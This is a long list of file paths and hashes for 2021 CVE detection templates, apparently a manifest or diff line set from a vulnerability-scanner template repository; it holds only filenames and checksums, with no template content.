-http/cves/2021/CVE-2021-21351.yaml:92f53891f4baf7673bb271ee0b95cc7d7ca4d643 -http/cves/2021/CVE-2021-21389.yaml:20542ddc6acbd0160d6c1225d891cc1dcb5f4133 -http/cves/2021/CVE-2021-21402.yaml:2c89ccbe5ba7e7d0438dbb896edc1e6d50605964 -http/cves/2021/CVE-2021-21479.yaml:6963bc05dc685ca2e4f0b9aa7fd825106165a32f -http/cves/2021/CVE-2021-21745.yaml:ca9109f940b1b2562fbdbbbb67f837636db1bb33 -http/cves/2021/CVE-2021-21799.yaml:8a01bd4ff1d400af89d71806456dabec50a21ffe -http/cves/2021/CVE-2021-21800.yaml:50a2874947828d9783937f9b53649b5eea5fdc5f -http/cves/2021/CVE-2021-21801.yaml:4497789a3a0c0a7ce23dc5973fb7c6b97b9ef253 -http/cves/2021/CVE-2021-21802.yaml:5e74ebe8c6751b7aeb20b2f5f6fd8b867263550f -http/cves/2021/CVE-2021-21803.yaml:0f89dee7ea7610b3b63e642b157c87098d058646 -http/cves/2021/CVE-2021-21805.yaml:ffb56ca5ed790bb89c33e9af95b90af1bd94bc6f -http/cves/2021/CVE-2021-21816.yaml:98b7641bd6f49df9cb94458922f00f875ab76334 -http/cves/2021/CVE-2021-21881.yaml:954b22491ae97cfa4a36dc12112c11176e7534ed -http/cves/2021/CVE-2021-21972.yaml:835eb54700606e6c4b48317e33ac6e584dcdbb74 -http/cves/2021/CVE-2021-21973.yaml:2e17587bbe390ce4947ea4f3effdfda016fc8e8a -http/cves/2021/CVE-2021-21975.yaml:79387f0f74cf9070d057bcb52826542b17e0acd7 -http/cves/2021/CVE-2021-21978.yaml:7fb5ade66f36ee0158de2bfe1bc018f91ab10b47 -http/cves/2021/CVE-2021-21985.yaml:d547b536718cb733af09eb64d8cb0c1ccc9b9c6e -http/cves/2021/CVE-2021-22005.yaml:908d5947d291d873a853bc45949181235c5f51a0 -http/cves/2021/CVE-2021-22053.yaml:f65bddcf77137c64db9a7bd1cfaf709e6f355b71 -http/cves/2021/CVE-2021-22054.yaml:fa4baa2ba5a0ae0af09a338e509a2a897b9fef5d -http/cves/2021/CVE-2021-22122.yaml:3813fcca33ebef7704f9182e321d91b2e376c14f -http/cves/2021/CVE-2021-22145.yaml:b20a4fdec8aa1fecf4086ae11f990f84c0111651 -http/cves/2021/CVE-2021-22205.yaml:68cc648ea43e99a9c250dfa2bfa8d0adcd86ea14 -http/cves/2021/CVE-2021-22214.yaml:7de8b8db1bdfbee9bea0a33b90053b13ed4a89f3 -http/cves/2021/CVE-2021-22502.yaml:e9d3ba9975ad870b998dadca015d087f55f1d9de -http/cves/2021/CVE-2021-22707.yaml:7ec3d5b2e89e100d7f8ca9eefbb4adb3521e9a5c -http/cves/2021/CVE-2021-22873.yaml:81ae38928acb51535d0d99975ed483c6f8133124 -http/cves/2021/CVE-2021-22911.yaml:4f17932d27d837326339d6df80916e963765600b -http/cves/2021/CVE-2021-22986.yaml:959ce280f19955b65778e09361d823371fbef8ec -http/cves/2021/CVE-2021-23241.yaml:b56322cf75541c5502919d664bfb13b2abfce885 -http/cves/2021/CVE-2021-24145.yaml:5393382627d423814a7e2120c1ac2219b716776b -http/cves/2021/CVE-2021-24146.yaml:612d087e058d632b37c9d9861c63dbf4a4a8eaae -http/cves/2021/CVE-2021-24150.yaml:f42a4cb7c114622adb41636009d05590e2b3384b -http/cves/2021/CVE-2021-24155.yaml:ad2c821546b700b80217f267c10a4dea904ef52d -http/cves/2021/CVE-2021-24165.yaml:a58da7285d708d43800a822267ac4e9d1121d5b2 -http/cves/2021/CVE-2021-24169.yaml:c2f2d47164d0d9ecdce681a4017fe11e9adfed90 -http/cves/2021/CVE-2021-24176.yaml:5be4b201f4b06ea7c0056fa98342f7b97ec7c7d1 -http/cves/2021/CVE-2021-24210.yaml:7e821a71f4b4482181d01d767e86f3e324c2748e -http/cves/2021/CVE-2021-24214.yaml:8074dca57fd51fa0a6cd9ea80d205e3174caecc4 -http/cves/2021/CVE-2021-24226.yaml:3544d2c77e180b7c7584a5fe8b3159089535f8d0 -http/cves/2021/CVE-2021-24227.yaml:cd08805ef4df670aa9430cdaa80cde1e85c6ebcb -http/cves/2021/CVE-2021-24235.yaml:9571e013463652f470de3150ae549e25a7469844 -http/cves/2021/CVE-2021-24236.yaml:86ccedbc0de44a3c5e82dab985dc0f0f8e4703f4 -http/cves/2021/CVE-2021-24237.yaml:182c2c1bfce046cecf790997a26c99cddac4a81e -http/cves/2021/CVE-2021-24239.yaml:81de1758f3f8f0850b925b6b4baad8dd8c9ffef0 -http/cves/2021/CVE-2021-24245.yaml:9ac5de8b85d2f7b97d4cad4f4e68a84980913ab6 -http/cves/2021/CVE-2021-24274.yaml:537d738351d0ed0f53ac579de4e968f54adab879 -http/cves/2021/CVE-2021-24275.yaml:36451d2b321003503f6fc817eb748c12dffb7f5e -http/cves/2021/CVE-2021-24276.yaml:24cdfb1620a0fea595dd12488e11462bd4cfdc73 -http/cves/2021/CVE-2021-24278.yaml:6cc641edcf260499b554e828120c5aab73135565 -http/cves/2021/CVE-2021-24284.yaml:1b288c84d916b8e3b02d8f46c37ca18e41ebfb9a -http/cves/2021/CVE-2021-24285.yaml:89aaf00db0af4ff7feb9935deae9ca35691fa350 -http/cves/2021/CVE-2021-24287.yaml:edd3a858fde8a473ab2ec19f4809500a68e0f5e7 -http/cves/2021/CVE-2021-24288.yaml:945cc2c42ed2469043657c217a2ef726ed4beaf4 -http/cves/2021/CVE-2021-24291.yaml:7385ada990d8f1557bbd3c33280937d22e108e80 -http/cves/2021/CVE-2021-24298.yaml:d4538b5795d0942150119ee5770fb77ec9512caf -http/cves/2021/CVE-2021-24300.yaml:b397b90afec788c6f13a594da14ed064c3029cef -http/cves/2021/CVE-2021-24316.yaml:d92831fc760eea0e377e2b50a220c93d8cefc224 -http/cves/2021/CVE-2021-24320.yaml:d792fd18690f539ff6e3a09eb3c302059c0b8d79 -http/cves/2021/CVE-2021-24335.yaml:092cab2422e11c925cdb7f4046b2cf90c16ab81b -http/cves/2021/CVE-2021-24340.yaml:294c86a15d107812dadc3ecd0e0e0bd0c0e27815 -http/cves/2021/CVE-2021-24342.yaml:ccf9420ba8df376f7bc770483cf82f9e9c24f084 -http/cves/2021/CVE-2021-24347.yaml:606556ed0e56f1ff987dad52d047b2f34852884a -http/cves/2021/CVE-2021-24351.yaml:336b34db36d576771cbcd69925906daa46a807f3 -http/cves/2021/CVE-2021-24358.yaml:ea8ff31be87cf0cec55be70eaba7d43baec34c7d -http/cves/2021/CVE-2021-24364.yaml:3399f4444bab3077e59c529024dec83262d23764 -http/cves/2021/CVE-2021-24370.yaml:d4b6997b1244757a2c1395f66b945d8599f194cf -http/cves/2021/CVE-2021-24387.yaml:7544b4684c4cf8f3fab4e96a70cad73517b4476a -http/cves/2021/CVE-2021-24389.yaml:ffe1a4a6bb2f5c55e2572c31cff0194632e0a0e5 -http/cves/2021/CVE-2021-24406.yaml:b624f55d30e9d29175c9df3a87da6660bb1c998f -http/cves/2021/CVE-2021-24407.yaml:0ff6588a2ca36e849fb023f7fba39d9146ec0d4a -http/cves/2021/CVE-2021-24409.yaml:21640fffafed297487f9c81c617e571f748b4b23 -http/cves/2021/CVE-2021-24435.yaml:4296ce63d92c5bccde9940254355f6811b0c5f29 -http/cves/2021/CVE-2021-24436.yaml:4778f3032531c967145ec8d6bc3848cc2e1d3b0e -http/cves/2021/CVE-2021-24452.yaml:06a966d924425e837d2e62759e02ccc37d6fab95 -http/cves/2021/CVE-2021-24472.yaml:66a84abe52a51f5ba36b7a31f30d5dceb130aace -http/cves/2021/CVE-2021-24488.yaml:ee7d3bf6bb95b7da74459220ade620e32b0468d3 -http/cves/2021/CVE-2021-24495.yaml:9eab131d1d1340bcdbda78658f68c5d397d0d2dd -http/cves/2021/CVE-2021-24498.yaml:08055cab5ce5c7b9b8f67726036558d2daa44605 -http/cves/2021/CVE-2021-24499.yaml:40d8b77eed671980c01a2968ec24de9397905ad6 -http/cves/2021/CVE-2021-24510.yaml:35ef50b8cdf222cf554762acb917b5e20b07e9d2 -http/cves/2021/CVE-2021-24554.yaml:ba4efea67ddc665218a3bf8308e602cb6f4e7f99 -http/cves/2021/CVE-2021-24647.yaml:b5d42e9d783d9d28640b8e4c0d596a659137f2d0 -http/cves/2021/CVE-2021-24666.yaml:8f36db8faa79f14a21b57c9b8cc780ba7b26e1b9 -http/cves/2021/CVE-2021-24731.yaml:c5eefd52fae9e020c6cd396772de31307fda4cba -http/cves/2021/CVE-2021-24746.yaml:0ea857f7ab46d687f0e22640e80c9e72f6295732 -http/cves/2021/CVE-2021-24750.yaml:f7be63f66cfd658277860f95445780cd9864e6b1 -http/cves/2021/CVE-2021-24762.yaml:ee2b120a79c77b8ee49b41a3bfd814b3e893424f -http/cves/2021/CVE-2021-24827.yaml:c7d88c3fae6c3f3b62b3d923d19d8184d284196c -http/cves/2021/CVE-2021-24838.yaml:7e19d027611c371f1ca6a6717496838b168253be -http/cves/2021/CVE-2021-24862.yaml:743e54fdcd9d9ce4080003bf66dac89d4c4423e9 -http/cves/2021/CVE-2021-24875.yaml:6390d5492b89d8bcdc46a0f26f45b27b5d1f4419 -http/cves/2021/CVE-2021-24891.yaml:e5c4fae5fdd586fd818564419d82b7e8cad3e6e0 -http/cves/2021/CVE-2021-24910.yaml:d3052ad62dcaa4a6c8ab879a353eed42dda3b9f3 -http/cves/2021/CVE-2021-24917.yaml:b3524dc68013bb5a75bed920d5db8dce8bae58f8 -http/cves/2021/CVE-2021-24926.yaml:40b37af6b21c78c16bc5594e33a0cf1d863dc2f2 -http/cves/2021/CVE-2021-24931.yaml:c43ef49f0970e0e21aff4e0b880abf50f2c17552 -http/cves/2021/CVE-2021-24940.yaml:e37099380810fbde3dcc5c3e2d3282e7f1dcb708 -http/cves/2021/CVE-2021-24946.yaml:aa953639aaf89e47047520fc150e6f811981ef10 -http/cves/2021/CVE-2021-24947.yaml:e8e865c361b22f4de2ce5cdd05863de9b94580a6 -http/cves/2021/CVE-2021-24956.yaml:eeb0d0eac14004270259efb4639ccff3e858111b -http/cves/2021/CVE-2021-24970.yaml:48660aaf588a701bb89ef9d75856564351de843e -http/cves/2021/CVE-2021-24987.yaml:5e6d38f343c9a84de7d801951f63e39d6ac381b6 -http/cves/2021/CVE-2021-24991.yaml:836939a4acb6fd4418aa3899fe0280c4b25e98b5 -http/cves/2021/CVE-2021-24997.yaml:3d9621a168f9ea814c3a3137fa777c0ff9dd36d4 -http/cves/2021/CVE-2021-25003.yaml:7c407c30039bf25a71eaedcabc4fd8a5d2620561 -http/cves/2021/CVE-2021-25008.yaml:4b2fc6d224af50eca202d82da2c6488627e175a0 -http/cves/2021/CVE-2021-25028.yaml:f26c1b533c512c607ac5d7677c92d0e87b5f2416 -http/cves/2021/CVE-2021-25033.yaml:e906fa3bf2e0ac1af8afc5d4f3993f3fabf79e05 -http/cves/2021/CVE-2021-25052.yaml:0f67a6605ac11d0e55412e6145f6bcc6548be0b8 -http/cves/2021/CVE-2021-25055.yaml:0fbff86ad8885b568d205110c142d3c1266ba002 -http/cves/2021/CVE-2021-25063.yaml:d3f4cd6067936d91e9deb4968e1dde2c7d0f4f02 -http/cves/2021/CVE-2021-25065.yaml:89f761960569982f965dec1af686c0c16948f704 -http/cves/2021/CVE-2021-25067.yaml:f277a9e74843597bcc4a315a520f8abf66db031f -http/cves/2021/CVE-2021-25074.yaml:b2fa5952168bc6f484c50b6d952311353fed2f75 -http/cves/2021/CVE-2021-25075.yaml:a77710dae5376299d74fa03f3ae04f65ba97172d -http/cves/2021/CVE-2021-25078.yaml:5e30713cb621f75e684588621871ca600913e3be -http/cves/2021/CVE-2021-25085.yaml:9e290e1fb13909441de662c410f9031fb3e40b83 -http/cves/2021/CVE-2021-25099.yaml:09af7c609ceb62fd164a5ee32e5a8e6d0a59b94a -http/cves/2021/CVE-2021-25104.yaml:b4efda62a8958cf5e6c4fd80c7c2af8e9b1464c0 -http/cves/2021/CVE-2021-25111.yaml:449ac28d2451018f7f5e9dceed31afe2cffc6872 -http/cves/2021/CVE-2021-25112.yaml:6eee76397aad4174482a3d33ae41d487a971fc0c -http/cves/2021/CVE-2021-25114.yaml:689ca31dd45c49f99250c1d988db39e5b002ad2d -http/cves/2021/CVE-2021-25118.yaml:fb4edc588aa300e3364ed0f606b6e68a2d503632 -http/cves/2021/CVE-2021-25120.yaml:57ad6e828ac60c7afd6b22d6dcde65510108bcf4 -http/cves/2021/CVE-2021-25281.yaml:5ca18d15f38fd13d445e1c58b8b4a46ece434dd0 -http/cves/2021/CVE-2021-25296.yaml:de9b53d257078a98fe9425699abd3dbc43059cfe -http/cves/2021/CVE-2021-25297.yaml:f3ca4513c1490945f4c8026965c235b54d25c9f9 -http/cves/2021/CVE-2021-25298.yaml:0aeb2e7614f299afdb65d0c2525944e12e8b760e -http/cves/2021/CVE-2021-25299.yaml:1e498fc0fe810ae787b861e385c27b2416a9a784 -http/cves/2021/CVE-2021-25646.yaml:eeb7f043790468f2f665ee3d24774e28539d2013 -http/cves/2021/CVE-2021-25864.yaml:4d55fd992a7dfc2aab671c9a57a364287b3cdb37 -http/cves/2021/CVE-2021-25899.yaml:995a6fa0a05edd21a2a7adf33a262948f6b70fbe -http/cves/2021/CVE-2021-26084.yaml:61a95df47fbee4511ab252b46d8710c42b478477 -http/cves/2021/CVE-2021-26085.yaml:8922352188cf0bdd39ce7a23f9aa437dc689dac6 -http/cves/2021/CVE-2021-26086.yaml:4ee3309d4bf7e8618bfbd99ac91b8942c56bb222 -http/cves/2021/CVE-2021-26247.yaml:6efaf564e27d786f4af825198da22432a01e2b47 -http/cves/2021/CVE-2021-26295.yaml:737cca4f9d78376eabaa45dcd7917e2596780a85 -http/cves/2021/CVE-2021-26475.yaml:bae57c3c162918e91fb72aee9b6e22c29f1083cd -http/cves/2021/CVE-2021-26598.yaml:2aa8eb84bc8efe16dc55d37c789ae739ca6445b5 -http/cves/2021/CVE-2021-26702.yaml:d10c6e8213427fe6d3af65f81ebaff0018bf33bf -http/cves/2021/CVE-2021-26710.yaml:c02697403908b44fb9ba13cc17ca386e9dc61636 -http/cves/2021/CVE-2021-26723.yaml:6fb07168e3470dbc7ce1557e48e09827fe061c29 -http/cves/2021/CVE-2021-26812.yaml:aa3d6a7566b0b4eb43cdf61fd947605d565fdf0f -http/cves/2021/CVE-2021-26855.yaml:438b5e2a90ebf968fd2301ce6a0688fc84cb84e0 -http/cves/2021/CVE-2021-27124.yaml:4ae0a0133f0aa6cf3f7312e601430fdabe1bb8cf -http/cves/2021/CVE-2021-27132.yaml:be012223ce98d244b82966396706e699492a0e19 -http/cves/2021/CVE-2021-27309.yaml:4890a8cdf49e982414077f7fb41a74a8a8439dd3 -http/cves/2021/CVE-2021-27310.yaml:4a753bcf4cbb1fe36bd4dd7535e6ec3381951d4e -http/cves/2021/CVE-2021-27314.yaml:a5b55e91c954c7303271ba88c87317919f837b2e -http/cves/2021/CVE-2021-27315.yaml:bc1627b76a426cddcfc5974bc57a2efc00a812c5 -http/cves/2021/CVE-2021-27316.yaml:f1bd6e1542fd9a06fda2b40b461f38d73a66448b -http/cves/2021/CVE-2021-27319.yaml:5545fb90ee149a0399d21e9d2d86aedfcb107445 -http/cves/2021/CVE-2021-27320.yaml:3871928ebed5b2089a82810c9b786476d1e50846 -http/cves/2021/CVE-2021-27330.yaml:1138bd11b6f8fe07e4e77ef467b91640128aaba3 -http/cves/2021/CVE-2021-27358.yaml:56d73e0bd74ed1151ed363a414bfa01587f6b556 -http/cves/2021/CVE-2021-27519.yaml:bc6dcb072cb3e1b29542f17d74c877bef024aa5a -http/cves/2021/CVE-2021-27520.yaml:c729b7a4c3948c8e4c912c5712a07da4b306f027 -http/cves/2021/CVE-2021-27561.yaml:bda606b9e157bbec34e89c67a9856693fb44adbd -http/cves/2021/CVE-2021-27651.yaml:08a0d9408635adfa51a8338fb1488716e9b64c7f -http/cves/2021/CVE-2021-27670.yaml:5e29e3de89b34c2072b098b24dd00ba394482afc -http/cves/2021/CVE-2021-27748.yaml:bace86e2ea9fd7f1d639a67ef3a81d42b3d3f4bb -http/cves/2021/CVE-2021-27850.yaml:f83de5f24579522b6bbc487a1882db9498005b09 -http/cves/2021/CVE-2021-27905.yaml:9ef62df0794a81032926621f274c3748ff0b4d82 -http/cves/2021/CVE-2021-27909.yaml:1ccf0df54c342ad44e5f071835af63d27fe0170f -http/cves/2021/CVE-2021-27931.yaml:3c89d0556f300cf8cb34e6924c5d4d0e13a6d659 -http/cves/2021/CVE-2021-28073.yaml:49810fdb0051c41bbc9bf70621b0622f9529acb0 -http/cves/2021/CVE-2021-28149.yaml:bdea2898f2a3195a5626317c1c9f2483c3340e1d -http/cves/2021/CVE-2021-28150.yaml:bf870d4374497571d56fdcedd6778f808c46ebdd -http/cves/2021/CVE-2021-28151.yaml:b7c52d869999e84b583f2ea0a1288c99d54ab283 -http/cves/2021/CVE-2021-28164.yaml:bc8253973c90c3f70383241f6ff8488e2524851e -http/cves/2021/CVE-2021-28169.yaml:dc09665155441ff22fbac718e80543488f162954 -http/cves/2021/CVE-2021-28377.yaml:741881a551b735d5c2028f7becf3fa028510a204 -http/cves/2021/CVE-2021-28419.yaml:4497bc2044ce940518b6c3420841bc9a8cf6cbac -http/cves/2021/CVE-2021-28854.yaml:661acaf6cc67c8c876543289ccad0effe9b908b4 -http/cves/2021/CVE-2021-28918.yaml:e7b356175157e85db13e6cf09ea4e432f1e06afc -http/cves/2021/CVE-2021-28937.yaml:9753cd42021aa3eb717aa646d9deb6b5e7e41884 -http/cves/2021/CVE-2021-29156.yaml:04285cc19c8703a90f4bff6f2fe04ee92f409e14 -http/cves/2021/CVE-2021-29203.yaml:4c7f7ea0e3d48ab628b4a3cb275570994d6bc140 -http/cves/2021/CVE-2021-29441.yaml:a536206a32cf403a011c23fd55cb685e9e89ffe9 -http/cves/2021/CVE-2021-29442.yaml:4875e3e1709999376bd39372b172f720fbe115c0 -http/cves/2021/CVE-2021-29484.yaml:2d26378f6ca3ff3d47d81c0e886624a9a518201a -http/cves/2021/CVE-2021-29490.yaml:24746e707a71c512b91d44e7a623d77a11f04fac -http/cves/2021/CVE-2021-29505.yaml:2874cb1b0ec0499e61731ccfb18d81ddc9df1273 -http/cves/2021/CVE-2021-29622.yaml:6faa79ce7593b7b1add8bf058d3d8828f1ca0b9b -http/cves/2021/CVE-2021-29625.yaml:4d1ce199073b3fef63cceb41fcb44ab1b3be1315 -http/cves/2021/CVE-2021-3002.yaml:a73dc103736f974051919e32faa1f2acb9eff895 -http/cves/2021/CVE-2021-30049.yaml:f94c6b3847495ea04b16f475d5847b457ae143cc -http/cves/2021/CVE-2021-30128.yaml:a7d1a5211417c028b4610808272467aaf173dd3a -http/cves/2021/CVE-2021-30134.yaml:de9fe443f126cb4a142f3c2bb4697461a7c8607d -http/cves/2021/CVE-2021-30151.yaml:289db5462434ec1643dca929caf92a1a1965c958 -http/cves/2021/CVE-2021-3017.yaml:d745e98128ca4afe20de63b7ebc8f4fe0b39e0ff -http/cves/2021/CVE-2021-30175.yaml:b2ff6fd1635228a416888cc7f65b7d2de9896cd8 -http/cves/2021/CVE-2021-3019.yaml:c33f2b671ccdb3318b98c8172db588192c6fed28 -http/cves/2021/CVE-2021-30213.yaml:371d6bef4ed59e9bc0a9d1c96097d6fea898d869 -http/cves/2021/CVE-2021-30461.yaml:b854badbb698b79d9b969da22d402120b711f5d5 -http/cves/2021/CVE-2021-30497.yaml:a30f758db8fbbcb11913527752adbf3f1138e731 -http/cves/2021/CVE-2021-3110.yaml:e14be833257673dc0c63a7071edae7b116cebb6d -http/cves/2021/CVE-2021-31195.yaml:d185281726deb825c0579f8707fc63c00222c9c5 -http/cves/2021/CVE-2021-31249.yaml:2b44ff5be077d92fe02bc326b4729ab812aa8ada -http/cves/2021/CVE-2021-31250.yaml:f2cead4cb7a65e80a91b7a8ebbb07d38269868f0 -http/cves/2021/CVE-2021-3129.yaml:abaf6a818fee78b897708f062a1502bf42107045 -http/cves/2021/CVE-2021-31537.yaml:ad54cd9c82b7e5de8549c743bcbb708fc5d96550 -http/cves/2021/CVE-2021-31581.yaml:2b0967eeec8615aa33638b0ed08c70c443c7787d -http/cves/2021/CVE-2021-31589.yaml:c25c79959affbbd02bc084c6cb53c86b9e1967ed -http/cves/2021/CVE-2021-31602.yaml:add0d7f8c76798f776dc23198b7895c59a90efdf -http/cves/2021/CVE-2021-31682.yaml:f2624d61716f97733f8d6672a3018346b786ed22 -http/cves/2021/CVE-2021-31755.yaml:588ce59015bbe40b6f4cf37ad526eb85b1ddd554 -http/cves/2021/CVE-2021-31805.yaml:f3d8bca3f01fc6845bd4d1ab45d7cc836e588176 -http/cves/2021/CVE-2021-31856.yaml:63a732da2381feb45937df2ea4fb2d97ca1b230f -http/cves/2021/CVE-2021-31862.yaml:9df4cc8e1ebc3ac512591f02a8e0cf3907ba7342 -http/cves/2021/CVE-2021-32030.yaml:145f6687ddc55aa14cab92aba98ee00a93daaa05 -http/cves/2021/CVE-2021-32172.yaml:8c4171d06fcbe9a2623517bc23754e9055bd3085 -http/cves/2021/CVE-2021-3223.yaml:e12d4fe0aac0568ce4342e6a0671a7f71119d6da -http/cves/2021/CVE-2021-32305.yaml:e32d24d73a7793fbdcb86ef264be1c04d5b90750 -http/cves/2021/CVE-2021-32618.yaml:24714214b07b23b56635d3af3f4385a709fccc1e -http/cves/2021/CVE-2021-32682.yaml:dbc567cddbe5ace9da05bca3347c054cf2430886 -http/cves/2021/CVE-2021-32789.yaml:7df42a6f562ca789097d9c835bfca04e3ca52da3 -http/cves/2021/CVE-2021-32819.yaml:1bc5f6dee4b5bda4cc30c9d0476c3e4a26ae3daa -http/cves/2021/CVE-2021-32820.yaml:0faf5402e6aee088e31f4b695fc1d1d59eefca32 -http/cves/2021/CVE-2021-32853.yaml:e8d62110f9ec97b7f4c06e70081581e5a8c8c312 -http/cves/2021/CVE-2021-3293.yaml:e56df85ba08cbc27a866d9b75cd75ce1c7e57b9a -http/cves/2021/CVE-2021-3297.yaml:3bfaf6d778c04a00894ec2d66fbd6bfd52a74017 -http/cves/2021/CVE-2021-33044.yaml:7505c04b5a815c29f98829c7ff82543d078f68ff -http/cves/2021/CVE-2021-33221.yaml:a3291afaa2b9adf0ac7f3f1b833d404e86ebf257 -http/cves/2021/CVE-2021-33357.yaml:7d9216fe268ff4cce962f30454d2e6563093055c -http/cves/2021/CVE-2021-33544.yaml:e9c5c367ddfee3f3ab6eb8e10cfe7e3ca5bf6497 -http/cves/2021/CVE-2021-33564.yaml:ae07abbe4c12e448c2583d0dc64416a9337007d6 -http/cves/2021/CVE-2021-3374.yaml:fc73b25d1cfc1573a4da98fbc091a66fc2654976 -http/cves/2021/CVE-2021-3377.yaml:ad20849d60180a467d43fb5de3ff76ec2eff6b5a -http/cves/2021/CVE-2021-3378.yaml:523c6f487d50f63dc9f8ebd186a4708a46191aba -http/cves/2021/CVE-2021-33807.yaml:14030ebe73f5378634f50b1860c9406bb5c22553 -http/cves/2021/CVE-2021-33851.yaml:3dfc35e4d7673c3da12b2df564ce4860e72d885c -http/cves/2021/CVE-2021-33904.yaml:9f0d0daea619ed16e852a52f4e7ad6ff261bcd94 -http/cves/2021/CVE-2021-34370.yaml:5e79f6c9eae83559b4a65bb046b22626214b0ad9 -http/cves/2021/CVE-2021-34429.yaml:2e79e07654eb328fff4da7972ae9d53fab42e01e -http/cves/2021/CVE-2021-34473.yaml:6033651c7d1b24b424c31d6c04242bf13c4b0430 -http/cves/2021/CVE-2021-34621.yaml:5a01b11fb559ba5b56c8e5dcebae7c783c8d5617 -http/cves/2021/CVE-2021-34640.yaml:6b95de7e73a2e7e9b2ab2d658c699c32f12c04b7 -http/cves/2021/CVE-2021-34643.yaml:f3159f4cf9122c459724fea6a7ac6e1840130a5e -http/cves/2021/CVE-2021-34805.yaml:002c4c01fa270658328359a9462d97a20977155d -http/cves/2021/CVE-2021-35250.yaml:90c6aaf2f33a34399462f56742d400f166e5201d -http/cves/2021/CVE-2021-35265.yaml:cb9ab796110b72faf9e8a0058e2002e718495f96 -http/cves/2021/CVE-2021-35336.yaml:fde55fc4d7723a2d3b9fc50a225cc3b6f4045cfe -http/cves/2021/CVE-2021-35380.yaml:d7a9289b9536efb1d03549e1a0aa206b0a060f68 -http/cves/2021/CVE-2021-35464.yaml:aa840ddee6dec7485f1524268711cc17fc353ca3 -http/cves/2021/CVE-2021-35488.yaml:0cae67d39022f951e97ac18e2ac86f2bb1be8523 -http/cves/2021/CVE-2021-35587.yaml:a8d802c61a2f2f5b3d99eabb61423d8a03262c4d -http/cves/2021/CVE-2021-3577.yaml:8618df670def9f9d7cf611b325ad7dabceefd35a -http/cves/2021/CVE-2021-36260.yaml:4b8940c7d8061e535b59d9e106a1aeb9b8e976db -http/cves/2021/CVE-2021-36356.yaml:de7d99a5e7c554def62dfedc5cffdd3e2ceb4e75 -http/cves/2021/CVE-2021-36380.yaml:b0ec9ca25fc696debcd6fe8764e06488774a5c21 -http/cves/2021/CVE-2021-36450.yaml:66247c208b148d3673c37e4c68dae120f568c216 -http/cves/2021/CVE-2021-3654.yaml:0b22df45bf72d52aa691ecf84451c155940abb06 -http/cves/2021/CVE-2021-36580.yaml:f6d188ce8162dd4a3a753ac920098c55e62a0845 -http/cves/2021/CVE-2021-36748.yaml:28e6331305ffdaef3e03fa9d1550ac908d2b6414 -http/cves/2021/CVE-2021-36749.yaml:ec46955017b66ec92463041d01bd7bfdfecc2b1b -http/cves/2021/CVE-2021-36873.yaml:376f10a3b611347a1e7d13568bc9efb8e76f5ab9 -http/cves/2021/CVE-2021-37216.yaml:0bdc41e631ad80e58161590b40601baf699641c0 -http/cves/2021/CVE-2021-37304.yaml:fa8b348d24f271b644898eb0337d532d901f45c4 -http/cves/2021/CVE-2021-37305.yaml:03c68924ac928d0672c1ff4e67ea559dbb39ed64 -http/cves/2021/CVE-2021-37416.yaml:8e37d6f3e57dc6fc08303cf8f06dbb3e358d10c7 -http/cves/2021/CVE-2021-37538.yaml:c539cf0fc4f29b4dd0d21480c355ac7263ff5f79 -http/cves/2021/CVE-2021-37573.yaml:8d842a6a3c8f205083b2db4914db3dd2f4ecce3d -http/cves/2021/CVE-2021-37580.yaml:c60207572710b77119b04e983c761099cedd375b -http/cves/2021/CVE-2021-37589.yaml:b112c45e4501e9dce46c6594b5b7da5318ceed17 -http/cves/2021/CVE-2021-37704.yaml:76534b2541d774d6a15f6c62ac660cfff6554fde -http/cves/2021/CVE-2021-37833.yaml:a1684b67f12b5bde655be844af326ff7c0d65e8f -http/cves/2021/CVE-2021-38314.yaml:4ab0e1341adfe0d311d416c939460ef1d796fec1 -http/cves/2021/CVE-2021-38540.yaml:a0850c9b599e4aa15868dc6eb30d5d61638f5bec -http/cves/2021/CVE-2021-38647.yaml:62edaac22f00298f8f693937924a58905c231455 -http/cves/2021/CVE-2021-38702.yaml:359561051625e157b7b66f613320593d205fea10 -http/cves/2021/CVE-2021-38704.yaml:07a1997835d2f1b30fd0bb02fd5b491da3296e16 -http/cves/2021/CVE-2021-38751.yaml:3522ae6b9764a2816b8f0b7ce5f84071e335fc04 -http/cves/2021/CVE-2021-39141.yaml:8555f9c1e9bcb8f6668c134d97e0a68cceafa9b1 -http/cves/2021/CVE-2021-39144.yaml:2c04c58d042aeb658004d17bb21cb5bd92e4cbf3 -http/cves/2021/CVE-2021-39146.yaml:0f26c9b132fa46ece1ec8b6c9e776dddc5c4ac8d -http/cves/2021/CVE-2021-39152.yaml:af84c1315ba44bc148fd2b9b85228c901f5b1667 -http/cves/2021/CVE-2021-39165.yaml:98f60c78f8cfecac17445e01ac4496899e9741cd -http/cves/2021/CVE-2021-39211.yaml:7aefa89f4a55720c65d5845be4091e9a042f8510 -http/cves/2021/CVE-2021-39226.yaml:cacf2f58f4cfb161cd7d1a0ea2702212d568c884 -http/cves/2021/CVE-2021-39312.yaml:f4448da1a4c7ee292c6be019fed7f6929b4bf7f6 -http/cves/2021/CVE-2021-39316.yaml:e1d070ad67dae863ec8e9f1a8bdaa7ca2acf407d -http/cves/2021/CVE-2021-39320.yaml:1bc3967ee36bc8e9b8b01a88d4f86d80a2eecd04 -http/cves/2021/CVE-2021-39322.yaml:4e3f9cd5735eba98d115379b6d12ba6fb6f44773 -http/cves/2021/CVE-2021-39327.yaml:dd8f9f6fa44dea7712e90d29479129419ec8eaa1 -http/cves/2021/CVE-2021-39350.yaml:4500918f24b2b8ba0ecae7b9a167386ff68f2308 -http/cves/2021/CVE-2021-39433.yaml:ebaa2900f1a6a211a18aadd3488470f0c7e42cc7 -http/cves/2021/CVE-2021-39501.yaml:157b2a28ec0da3a37cbc49f12bbac4ae830586cb -http/cves/2021/CVE-2021-40149.yaml:0b6f7c1796a5d5d334f86be6e63af90c78df2405 -http/cves/2021/CVE-2021-40150.yaml:462209a78f70cf448040e1941a28293f382bdd7d -http/cves/2021/CVE-2021-40323.yaml:47dc6ce4236d30838aaa7dc1d79eb4e6861fd1f2 -http/cves/2021/CVE-2021-40438.yaml:d5f0d290589b5de9e6c86f0f7c1c4faa9121bc02 -http/cves/2021/CVE-2021-40539.yaml:030d995a8e63244ec57c91960eaca23dccafdd14 -http/cves/2021/CVE-2021-40542.yaml:ef709c09af78e906a9b32437dfcec17fb70fb199 -http/cves/2021/CVE-2021-40661.yaml:c8927b5951fa27fffb73924ebe7c08d67a5de55b -http/cves/2021/CVE-2021-40822.yaml:5cebaf15fc5c523c29d7891df327a69d2e8c3a4e -http/cves/2021/CVE-2021-40856.yaml:9b880e381c8cd11ea1312ef76d47f8a9c65168d8 